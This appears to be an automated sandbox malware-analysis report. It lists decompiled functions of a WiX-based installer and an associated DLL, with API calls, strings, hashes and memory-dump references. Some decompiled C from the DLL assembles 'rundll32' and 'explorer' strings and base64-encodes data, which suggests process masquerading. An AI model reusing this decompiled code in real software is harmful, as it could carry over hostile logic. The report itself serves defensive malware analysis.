					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003090(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF80(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CCA3(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D1F0(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAD0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAD0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}










                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x100219a3
                                                                                                                                                                  0x100219af
                                                                                                                                                                  0x100219b4
                                                                                                                                                                  0x100219ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100219c0
                                                                                                                                                                  0x100219ce
                                                                                                                                                                  0x100219e4
                                                                                                                                                                  0x10021a0b
                                                                                                                                                                  0x10021a2e
                                                                                                                                                                  0x10021a52
                                                                                                                                                                  0x10021a91
                                                                                                                                                                  0x10021aa7
                                                                                                                                                                  0x10021abd
                                                                                                                                                                  0x10021ada
                                                                                                                                                                  0x10021ae8
                                                                                                                                                                  0x10021aef
                                                                                                                                                                  0x10021af3
                                                                                                                                                                  0x10021b06
                                                                                                                                                                  0x10021b0b
                                                                                                                                                                  0x10021b14
                                                                                                                                                                  0x10021b36
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b45
                                                                                                                                                                  0x10021b4a
                                                                                                                                                                  0x10021b50
                                                                                                                                                                  0x10021b50
                                                                                                                                                                  0x10021b58
                                                                                                                                                                  0x10021b58
                                                                                                                                                                  0x10021b62
                                                                                                                                                                  0x10021b67
                                                                                                                                                                  0x10021b71
                                                                                                                                                                  0x10021b76
                                                                                                                                                                  0x10021b83
                                                                                                                                                                  0x10021b88
                                                                                                                                                                  0x10021b8f
                                                                                                                                                                  0x10021ba4
                                                                                                                                                                  0x10021baf
                                                                                                                                                                  0x10021bb3
                                                                                                                                                                  0x10021bc3
                                                                                                                                                                  0x10021bc8
                                                                                                                                                                  0x10021bd1
                                                                                                                                                                  0x10021bf3
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021c0d
                                                                                                                                                                  0x10021c16
                                                                                                                                                                  0x10021c21

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3854912713-0
                                                                                                                                                                  • Opcode ID: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction ID: 1147c12dce7df64e2ed4ffc9360bb1615f7fbc1f7e9a2ddb3abdd0b7a3fb9a22
                                                                                                                                                                  • Opcode Fuzzy Hash: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41A6B6D001186BDB14D7A0DC92EEE737DEF04240F0448A5F50DB6246EB757B488BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404496, Relevance: 13.6, APIs: 2, Strings: 7, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00416698,00000000,00000000,00000000,00000001,00000000,00000001,?,00000000,00000001), ref: 004044A1
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,00000001,?,?,?,?,00416698,00000000,00000000,00000000,00000001,00000000,00000001,?,00000000), ref: 004045D1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write variable value as number., xrefs: 004045AD
                                                                                                                                                                  • Failed to write variable value as string., xrefs: 0040459A
                                                                                                                                                                  • Failed to write variable name., xrefs: 004045BB
                                                                                                                                                                  • Failed to write included flag., xrefs: 004045C2
                                                                                                                                                                  • Unsupported variable type., xrefs: 004045A6
                                                                                                                                                                  • Failed to write variable value type., xrefs: 004045B4
                                                                                                                                                                  • Failed to write variable count., xrefs: 004044BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.
                                                                                                                                                                  • API String ID: 3168844106-275034954
                                                                                                                                                                  • Opcode ID: f19d28bbe33079136632ef5d8abd6555bc5d541ed182ffd124b4a3a66ed4d70b
                                                                                                                                                                  • Instruction ID: 8eaca3d603ec3d3a92ec4fdb04d335316eccbc37c5c049fc76d6513036bb9c56
                                                                                                                                                                  • Opcode Fuzzy Hash: f19d28bbe33079136632ef5d8abd6555bc5d541ed182ffd124b4a3a66ed4d70b
                                                                                                                                                                  • Instruction Fuzzy Hash: C041BFB2510616FFCB169F64DC40A5E7AA0BF48310F104227FB01762D0D739E9609F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004139ED, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 188COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get current process directory., xrefs: 00413AAA
                                                                                                                                                                  • Failed to get path to current process., xrefs: 00413A8E
                                                                                                                                                                  • Failed to copy source path., xrefs: 00413B8D
                                                                                                                                                                  • Failed to combine last source with source., xrefs: 00413AC9
                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 00413A34
                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 00413A4F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                  • String ID: Failed to combine last source with source.$Failed to copy source path.$Failed to get current process directory.$Failed to get path to current process.$WixBundleLastUsedSource$WixBundleOriginalSource
                                                                                                                                                                  • API String ID: 2767606509-10224182
                                                                                                                                                                  • Opcode ID: 0698bc28373c35da1d68245fcaef15d54a516aeacab2efef4553d9d6207ffa67
                                                                                                                                                                  • Instruction ID: 4c757f35194ed20d234cb27d9fa2254018be9a564835aa62fe734b8d3d384501
                                                                                                                                                                  • Opcode Fuzzy Hash: 0698bc28373c35da1d68245fcaef15d54a516aeacab2efef4553d9d6207ffa67
                                                                                                                                                                  • Instruction Fuzzy Hash: A0516E71D04219AFDF11DFA5CC41AEFBBB4AF08356F11456BE814F6251E738AE808B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00425909, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 165networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpSendRequestW.WININET(?,00000000,00000000,00000000,00000000), ref: 00425923
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0042570D,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 0042592D
                                                                                                                                                                    • Part of subcall function 004386FC: HttpQueryInfoW.WININET(?,?,00000000,?,?), ref: 00438725
                                                                                                                                                                    • Part of subcall function 004386FC: GetLastError.KERNEL32 ref: 0043872F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 00425943
                                                                                                                                                                  • Failed to get HTTP status code for request to URL: %ls, xrefs: 00425AC3
                                                                                                                                                                  • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00425AAA
                                                                                                                                                                  • Failed to get redirect url: %ls, xrefs: 00425A77
                                                                                                                                                                  • Failed to get HTTP status code for failed request to URL: %ls, xrefs: 00425963
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpLast$InfoQueryRequestSend
                                                                                                                                                                  • String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls
                                                                                                                                                                  • API String ID: 3042603112-2903077892
                                                                                                                                                                  • Opcode ID: 079c4824d9f007b4ac4733160bdf402760976cacb2395f798e9ab7eebd497300
                                                                                                                                                                  • Instruction ID: 07e984adc39fe4f5005a601f73201bfbd26e3a2f9c7ed309fd19a6709aee4511
                                                                                                                                                                  • Opcode Fuzzy Hash: 079c4824d9f007b4ac4733160bdf402760976cacb2395f798e9ab7eebd497300
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D41F771750E3AABEB155E68AC87B7B2658EB18350FA40327FC01DB350E27CCD41969D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00420946, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 158COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,00000001,00000000,?,?,?,?,?,?,004201B3), ref: 00420A08
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?,?,?,?,?,?,004201B3), ref: 00420A12
                                                                                                                                                                  Strings
                                                                                                                                                                  • apply.cpp, xrefs: 00420A36
                                                                                                                                                                  • Failed to clear readonly bit on payload destination path: %ls, xrefs: 00420A41
                                                                                                                                                                  • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 00420AD5
                                                                                                                                                                  • download, xrefs: 004209D2
                                                                                                                                                                  • :, xrefs: 00420A8B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                  • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                                                                  • API String ID: 1799206407-1905830404
                                                                                                                                                                  • Opcode ID: 1b10e421fb509421af7df3d50118213b877061a46d8531d20e1e9ebedb8e97d8
                                                                                                                                                                  • Instruction ID: b5be7db71d0f6cc7fdaad5cbb4459bf297db5b848e0878b09bff066ac5df44a7
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b10e421fb509421af7df3d50118213b877061a46d8531d20e1e9ebedb8e97d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D51A272B00325AFEB10DF95D890BABB7F4FF14714F90805AE905AB252D379DA41CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022530, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E10022530(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100264e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100264e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100264f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100264f4; // 0x0
				_v300 = _t116;
				E1000CF80(__edi,  &_v292, 0, 0x108);
				E1001F1B0( &_v24,  &_v292,  &_v24);
				E1000D1F0(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
				_t118 = _a4;
				_v12 = E1000CAD0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CEAF(_t101, _t120, _t131, _t132, _v296);
				E1000CF80(_t131, _v8, 0, _v296);
				E1000D1F0(_t101, _t131, _t132, _v8, _a4, E1000CAD0(_a4));
				E1001F110(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CEAF(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF80(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F2A0(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA40(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}
























                                                                                                                                                                  0x10022530
                                                                                                                                                                  0x10022530
                                                                                                                                                                  0x10022530
                                                                                                                                                                  0x10022539
                                                                                                                                                                  0x1002253e
                                                                                                                                                                  0x10022541
                                                                                                                                                                  0x10022547
                                                                                                                                                                  0x1002254a
                                                                                                                                                                  0x10022550
                                                                                                                                                                  0x10022553
                                                                                                                                                                  0x10022558
                                                                                                                                                                  0x1002255e
                                                                                                                                                                  0x10022564
                                                                                                                                                                  0x1002256a
                                                                                                                                                                  0x10022570
                                                                                                                                                                  0x10022584
                                                                                                                                                                  0x10022597
                                                                                                                                                                  0x100225ac
                                                                                                                                                                  0x100225b4
                                                                                                                                                                  0x100225c0
                                                                                                                                                                  0x100225c3
                                                                                                                                                                  0x100225d0
                                                                                                                                                                  0x100225d5
                                                                                                                                                                  0x100225db
                                                                                                                                                                  0x100225db
                                                                                                                                                                  0x100225de
                                                                                                                                                                  0x100225fe
                                                                                                                                                                  0x100225fe
                                                                                                                                                                  0x10022601
                                                                                                                                                                  0x100225e0
                                                                                                                                                                  0x100225e3
                                                                                                                                                                  0x100225e4
                                                                                                                                                                  0x100225f3
                                                                                                                                                                  0x100225f3
                                                                                                                                                                  0x10022616
                                                                                                                                                                  0x10022626
                                                                                                                                                                  0x10022643
                                                                                                                                                                  0x10022661
                                                                                                                                                                  0x10022672
                                                                                                                                                                  0x1002268a
                                                                                                                                                                  0x10022699
                                                                                                                                                                  0x100226b2
                                                                                                                                                                  0x100226cb
                                                                                                                                                                  0x100226ce
                                                                                                                                                                  0x100226e5
                                                                                                                                                                  0x100226f0
                                                                                                                                                                  0x100226f1
                                                                                                                                                                  0x10022702

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen
                                                                                                                                                                  • String ID: explorer$rundll32
                                                                                                                                                                  • API String ID: 1975251954-2912785976
                                                                                                                                                                  • Opcode ID: 9443fa5ab6797b87b178558609728bb1873431855db9e7741aa6f05c907c90f5
                                                                                                                                                                  • Instruction ID: dabab85bc6ef052ed749d04d1e93e2dad56e743369109b7e858dc002110f0523
                                                                                                                                                                  • Opcode Fuzzy Hash: 9443fa5ab6797b87b178558609728bb1873431855db9e7741aa6f05c907c90f5
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A516DBAD00218ABDB14DB98DC92FDE73B9EB4C304F044199E54997341EA31FB54CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B31F, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 121registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000,?,?,00020006,00000000,00401414,00000001), ref: 0040B423
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00000000,00000000,00000000,?,?,00020006,00000000,00401414,00000001), ref: 0040B430
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls.RebootRequired, xrefs: 0040B346
                                                                                                                                                                  • Failed to open registration key., xrefs: 0040B461
                                                                                                                                                                  • Failed to write volatile reboot required registry key., xrefs: 0040B370
                                                                                                                                                                  • Failed to update resume mode., xrefs: 0040B408
                                                                                                                                                                  • Failed to delete registration key: %ls, xrefs: 0040B3D2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
                                                                                                                                                                  • API String ID: 3535843008-2517785395
                                                                                                                                                                  • Opcode ID: d958354166063fd9082e3b373f56b229dab8a3801a4dfd616c3118c500a88bf7
                                                                                                                                                                  • Instruction ID: cbef5d51cf136f906b777c30e3e8c22d283489d28ec1a1f4cc3a22e0214a8707
                                                                                                                                                                  • Opcode Fuzzy Hash: d958354166063fd9082e3b373f56b229dab8a3801a4dfd616c3118c500a88bf7
                                                                                                                                                                  • Instruction Fuzzy Hash: DD418E36900218FBCF11AFA19C41D9FBBB9EF44308F20843FF90572192D7799A509B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A63A, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,00000000,00000000,000000F8,00000100,?,00000000,?), ref: 0040A75F
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,00000000,00000000,000000F8,00000100,?,00000000,?), ref: 0040A76C
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls.RebootRequired, xrefs: 0040A64E
                                                                                                                                                                  • Failed to open registration key., xrefs: 0040A6CB
                                                                                                                                                                  • Failed to format pending restart registry key to read., xrefs: 0040A66E
                                                                                                                                                                  • Resume, xrefs: 0040A6D6
                                                                                                                                                                  • Failed to read Resume value., xrefs: 0040A6F8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                  • API String ID: 3535843008-3890505273
                                                                                                                                                                  • Opcode ID: 4ee1fe4a0767466e797e8ed133812321f1d3276df81f63fbd81463be14d9f030
                                                                                                                                                                  • Instruction ID: 59c0d1a5aa3fce75bcb8150df50c79763769077d3801cecda617ebec4de6cd86
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ee1fe4a0767466e797e8ed133812321f1d3276df81f63fbd81463be14d9f030
                                                                                                                                                                  • Instruction Fuzzy Hash: 94418235900318EFCB11AF94C980AAEBBB4FB04314F258177E914B7290D37DEE619B5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004140C7, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 110COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                                                  • API String ID: 0-660234312
                                                                                                                                                                  • Opcode ID: cbcb56998c28ac9479d5fd0666458dfcf87b496e03f093fa7cbe70e74e16f28a
                                                                                                                                                                  • Instruction ID: cc6e89eb5fc584fe961a28a5ee14ae26f0cd037ddf2c19b67e5aeb0f85a03fd2
                                                                                                                                                                  • Opcode Fuzzy Hash: cbcb56998c28ac9479d5fd0666458dfcf87b496e03f093fa7cbe70e74e16f28a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5631CD32900129BBDF119B94CC49FDFBAB9AB94720F21026BF520B71D0D7789EC18798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041E34C, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add the package provider key "%ls" to the list of ignored dependencies., xrefs: 0041E3F5
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0041E3CB, 0041E3D0, 0041E3E7
                                                                                                                                                                  • Failed to get the package property: %ls, xrefs: 0041E3E8
                                                                                                                                                                  • Failed to add the bundle provider key "%ls" to the list of ignored dependencies., xrefs: 0041E397
                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 0041E36E
                                                                                                                                                                  • Failed to add the provider key "%ls" to the list of ignored dependencies., xrefs: 0041E434
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
